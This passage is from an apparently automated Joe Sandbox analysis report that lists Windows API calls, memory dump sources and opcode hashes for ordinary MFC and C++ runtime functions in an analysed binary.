                                                                  • lstrcpyW.KERNEL32(00000000,00000010,?,00000004,001EFEF2,?,?,00000002,?,?,00000000), ref: 0023DFF0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$H_prolog3_calloclstrcpy
                                                                  • String ID: X*1
                                                                  • API String ID: 3273239350-2740677128
                                                                  • Opcode ID: 95bb25cd047ad8cdd611e6e9af07656975200697e9bf6036e6667530a4a23fba
                                                                  • Instruction ID: cbaa2637a5981ee904a0defb671e5d65d0f1092eb22393cb647b5a63826563c4
                                                                  • Opcode Fuzzy Hash: 95bb25cd047ad8cdd611e6e9af07656975200697e9bf6036e6667530a4a23fba
                                                                  • Instruction Fuzzy Hash: 3B41ADB26202469FCF14EF68DCC5AAE77A5FF14320F14452AF5269B2D1CB70D864CB51
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Parent$FocusMessageSendUpdateWindow
                                                                  • String ID: 83/
                                                                  • API String ID: 2438739141-2323854675
                                                                  • Opcode ID: f757b5842efa072dccffe00ca1ef83aa8aea555e6de562a39d6928079c995b2d
                                                                  • Instruction ID: d342d148923d610423efb232c8d40c133fa4db1e50e53fab51cd829d34352e59
                                                                  • Opcode Fuzzy Hash: f757b5842efa072dccffe00ca1ef83aa8aea555e6de562a39d6928079c995b2d
                                                                  • Instruction Fuzzy Hash: E8319271604B409FDB25AF36CC85A6FB6E5EF94760F254A2DF56A97290DF30D9008B40
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001C733D
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001C7360
                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 001C73E4
                                                                  • __CxxThrowException@8.LIBCMT ref: 001C73F2
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001C7405
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
                                                                  • String ID: h*1
                                                                  • API String ID: 2513498551-1237549831
                                                                  • Opcode ID: a29212c026fd6a38009f470e460a2788cfb53eb9e7a6a5eaa2a1d5339fb56672
                                                                  • Instruction ID: 7fb4d245d426292b895f9e21280ff5b23c978bbd9940c73e0aafd8cd9d744127
                                                                  • Opcode Fuzzy Hash: a29212c026fd6a38009f470e460a2788cfb53eb9e7a6a5eaa2a1d5339fb56672
                                                                  • Instruction Fuzzy Hash: C931AF71914205DBCB25DF64D882FAEB7B8FB24720F50465EE811A72D1DBB0AD00CF90
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001C66DC
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001C66FF
                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 001C6780
                                                                  • __CxxThrowException@8.LIBCMT ref: 001C678E
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001C67A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
                                                                  • String ID: bad cast
                                                                  • API String ID: 2513498551-3145022300
                                                                  • Opcode ID: f7af5056bc5257b31ec5ba19ab083d50843c050c5617b2915f78c63481d4d733
                                                                  • Instruction ID: edf5fd9bf5cd196b90b467342c7089c52676239b0aca965bf79cf468930daf7b
                                                                  • Opcode Fuzzy Hash: f7af5056bc5257b31ec5ba19ab083d50843c050c5617b2915f78c63481d4d733
                                                                  • Instruction Fuzzy Hash: 2431BF35811311CBCB15DF64D982FAEB3B8FB24728F510A5EE426A7291DB70AD04CF91
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001C698C
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001C69AF
                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 001C6A30
                                                                  • __CxxThrowException@8.LIBCMT ref: 001C6A3E
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001C6A51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
                                                                  • String ID: bad cast
                                                                  • API String ID: 2513498551-3145022300
                                                                  • Opcode ID: a80ada1efe0e7e72f9cdf5468c165dee61139144a79d005c59d2344d6ce5fda2
                                                                  • Instruction ID: d252b567f418daa750668c6fe9d1400ac49463c44efdb5ba88e9487c3c632a5f
                                                                  • Opcode Fuzzy Hash: a80ada1efe0e7e72f9cdf5468c165dee61139144a79d005c59d2344d6ce5fda2
                                                                  • Instruction Fuzzy Hash: 55318D71910215CFCB25DF64D882FAEB3B8EB24724F51465EE822A7291DB70ED44CB91
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3
                                                                  • String ID: H]3$L]3$P]3$X]3$\]3
                                                                  • API String ID: 431132790-209029099
                                                                  • Opcode ID: b451a673e5180384f7c332c7498b4a3f089bdce8e6c6df928611d78ab8233268
                                                                  • Instruction ID: 3bf64e1d3d6011f474c2cfe2326481418f192d553afcaf17f769927637c22810
                                                                  • Opcode Fuzzy Hash: b451a673e5180384f7c332c7498b4a3f089bdce8e6c6df928611d78ab8233268
                                                                  • Instruction Fuzzy Hash: AF317A7190010ADFCF14FFA0C8959BEB376BF20310B64452EE9225B2A1DB309E50CB62
                                                                  APIs
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 001C6328
                                                                    • Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85A3
                                                                    • Part of subcall function 002D858E: __CxxThrowException@8.LIBCMT ref: 002D85B8
                                                                    • Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85C9
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 001C6346
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 001C6361
                                                                  • _memmove.LIBCMT ref: 001C63C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                  • String ID: invalid string position$string too long
                                                                  • API String ID: 443534600-4289949731
                                                                  • Opcode ID: 4f69ba24ab9e5ab873cb0302920615b34c82bcdf75ecf21504d1c54c392b71fd
                                                                  • Instruction ID: cebbf57814ac3f2f708d2e4b3bf63435d60caa050f424cb83c2dc866672f0ce8
                                                                  • Opcode Fuzzy Hash: 4f69ba24ab9e5ab873cb0302920615b34c82bcdf75ecf21504d1c54c392b71fd
                                                                  • Instruction Fuzzy Hash: F821A2323002408FD7259E6CE890F2AF7E5BFA5720B604A2EF45A8B781DB71DC50C760
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ClientCursorMessageScreenSend_free_memset
                                                                  • String ID: ,
                                                                  • API String ID: 628317799-3772416878
                                                                  • Opcode ID: 7f904db18dda5924c682617f858dc504b18fd299d0b6d1f85892fb193dca1c63
                                                                  • Instruction ID: 256611528abdf15ec17815a68c57864e881e97b0d587006ff59ba7be603521f1
                                                                  • Opcode Fuzzy Hash: 7f904db18dda5924c682617f858dc504b18fd299d0b6d1f85892fb193dca1c63
                                                                  • Instruction Fuzzy Hash: 2A318C31A10245AFCB28DBB9EC85E9DBBB8EB48315F20453DF80AD61A1DB309901CB50
                                                                  APIs
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 001C601F
                                                                    • Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85A3
                                                                    • Part of subcall function 002D858E: __CxxThrowException@8.LIBCMT ref: 002D85B8
                                                                    • Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85C9
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 001C6035
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 001C6050
                                                                  • _memmove.LIBCMT ref: 001C60B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                  • String ID: invalid string position$string too long
                                                                  • API String ID: 443534600-4289949731
                                                                  • Opcode ID: 9351590da3629bdd37922439f4d3ec21a80a6e1628ba0e7075e0b798bd9f375d
                                                                  • Instruction ID: bdc29d81ea736c5912a8efaeb5c21040da61c5fca30aee546b32c0fe81b2ab20
                                                                  • Opcode Fuzzy Hash: 9351590da3629bdd37922439f4d3ec21a80a6e1628ba0e7075e0b798bd9f375d
                                                                  • Instruction Fuzzy Hash: 8721B5313102005BD7399E6CDC91F6EB7EAAFA5710B504A1EF482EB781DB61EC64C7A4
                                                                  APIs
                                                                    • Part of subcall function 001E06C8: IsIconic.USER32(?), ref: 001E06E8
                                                                  • GetWindowRect.USER32(?,?), ref: 001E10C6
                                                                    • Part of subcall function 001D011B: ScreenToClient.USER32(?,?), ref: 001D012C
                                                                    • Part of subcall function 001D011B: ScreenToClient.USER32(?,?), ref: 001D0139
                                                                    • Part of subcall function 001E0CBE: __EH_prolog3_GS.LIBCMT ref: 001E0CC8
                                                                    • Part of subcall function 001E0CBE: GetWindowRect.USER32(?,?), ref: 001E0D17
                                                                    • Part of subcall function 001E0CBE: OffsetRect.USER32(?,?,?), ref: 001E0D2D
                                                                    • Part of subcall function 001E0CBE: CreateCompatibleDC.GDI32(?), ref: 001E0D9E
                                                                    • Part of subcall function 001E0CBE: SelectObject.GDI32(?,?), ref: 001E0DBE
                                                                  • GetModuleHandleW.KERNEL32(DWMAPI), ref: 001E10FE
                                                                  • GetProcAddress.KERNEL32(00000000,DwmSetIconicLivePreviewBitmap), ref: 001E110E
                                                                  • DeleteObject.GDI32(00000000), ref: 001E1125
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$ClientObjectScreenWindow$AddressCompatibleCreateDeleteH_prolog3_HandleIconicModuleOffsetProcSelect
                                                                  • String ID: DWMAPI$DwmSetIconicLivePreviewBitmap
                                                                  • API String ID: 3205686482-239049650
                                                                  • Opcode ID: aba5b4744e4653f7bb4c403b9c0901fd5b9672436fd49de4ca8d9db33efc0d2e
                                                                  • Instruction ID: 31446a1cdc2653c83464c7551a5d97186d8d2c55725d33d06071713b0c431edb
                                                                  • Opcode Fuzzy Hash: aba5b4744e4653f7bb4c403b9c0901fd5b9672436fd49de4ca8d9db33efc0d2e
                                                                  • Instruction Fuzzy Hash: AD317EB1A40649AF8B05DFAAD8858BEFBF9EF98700B10056EE116E7251CB705D00CB60
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 002A8A49
                                                                    • Part of subcall function 00297DE9: __EH_prolog3.LIBCMT ref: 00297DF0
                                                                    • Part of subcall function 002B9306: __EH_prolog3.LIBCMT ref: 002B930D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3
                                                                  • String ID: X*1$dF/$dI/$dI/$G/
                                                                  • API String ID: 431132790-3278520713
                                                                  • Opcode ID: 8b927ace8add995c0ec39ae5dbb5aff756cefbeb6172c589a8e0325aa4fa6591
                                                                  • Instruction ID: f71e116de92fec816470b6fc64051b1bd7cb7485d801ba9f28a64313ac168600
                                                                  • Opcode Fuzzy Hash: 8b927ace8add995c0ec39ae5dbb5aff756cefbeb6172c589a8e0325aa4fa6591
                                                                  • Instruction Fuzzy Hash: A1411CB4805B88DED761EF78C045BDFBBE4AF25304F10495EA6AA57282DF702648CB16
                                                                  APIs
                                                                  • LockWindowUpdate.USER32(00000000,00000000,?,?,?,0027571B,00000000), ref: 002004E6
                                                                  • ValidateRect.USER32(?,00000000,?,?,0027571B,00000000), ref: 0020051B
                                                                  • UpdateWindow.USER32(?), ref: 00200520
                                                                  • LockWindowUpdate.USER32(00000000,?,0027571B,00000000), ref: 00200533
                                                                  • ValidateRect.USER32(?,00000000,?,?,0027571B,00000000), ref: 0020055A
                                                                  • UpdateWindow.USER32(?), ref: 0020055F
                                                                  • LockWindowUpdate.USER32(00000000,?,0027571B,00000000), ref: 00200572
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: UpdateWindow$Lock$RectValidate
                                                                  • String ID:
                                                                  • API String ID: 797752328-0
                                                                  • Opcode ID: 0cc62b292fb530919aa8957a60ee403bcc5b89ded39577229652a13b8a6214d2
                                                                  • Instruction ID: abb1a9e05c64ca0bdda757624418d5034f745c422fb124b9394ee46663ecc13b
                                                                  • Opcode Fuzzy Hash: 0cc62b292fb530919aa8957a60ee403bcc5b89ded39577229652a13b8a6214d2
                                                                  • Instruction Fuzzy Hash: 7821CE32610202EBEB254F54ECC8B69BBB1FF44350F694029E54D6B1A2DB70EDA0DB90
                                                                  APIs
                                                                  • SetFocus.USER32(00000000,00000000), ref: 00208483
                                                                  • GetParent.USER32(?), ref: 00208491
                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 002084AC
                                                                  • GetCurrentProcessId.KERNEL32 ref: 002084B2
                                                                  • GetActiveWindow.USER32 ref: 00208505
                                                                  • SendMessageW.USER32(?,00000006,00000001,00000000), ref: 00208519
                                                                  • SendMessageW.USER32(?,00000086,00000001,00000000), ref: 0020852D
                                                                    • Part of subcall function 001DCD97: EnableWindow.USER32(?,?), ref: 001DCDA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
                                                                  • String ID:
                                                                  • API String ID: 2169720751-0
                                                                  • Opcode ID: 03b1be5176c78ec30210f6cd1b83e02d6622dfc5b64d704db7a36b60502f0e46
                                                                  • Instruction ID: 6c5934cca76543dc0381f5919eabf773e010dfa7368b57b8c5748b31c59f6852
                                                                  • Opcode Fuzzy Hash: 03b1be5176c78ec30210f6cd1b83e02d6622dfc5b64d704db7a36b60502f0e46
                                                                  • Instruction Fuzzy Hash: B1210231250740ABCB219F24DCC8B6B7FA5FF44714F250518F5CA8B1E2CFB0A8808B50
                                                                  APIs
                                                                  • IsWindow.USER32(?), ref: 00212AC5
                                                                  • SendMessageW.USER32(?,0000020A,?,?), ref: 00212AF7
                                                                  • GetFocus.USER32 ref: 00212B0B
                                                                  • IsChild.USER32(?,?), ref: 00212B2D
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00212B5E
                                                                  • IsWindowVisible.USER32(?), ref: 00212B73
                                                                  • SendMessageW.USER32(?,0000020A,?,?), ref: 00212B91
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ChildFocusVisible
                                                                  • String ID:
                                                                  • API String ID: 1252167185-0
                                                                  • Opcode ID: a3578a72adc56c9f3a8d61ed51b44e2c9a3c9316887c94a5f3548b00f8c0c57d
                                                                  • Instruction ID: 903818fd9c57780f25a6c4f00632b2b192258dc4994c6a6af5246561f02be89d
                                                                  • Opcode Fuzzy Hash: a3578a72adc56c9f3a8d61ed51b44e2c9a3c9316887c94a5f3548b00f8c0c57d
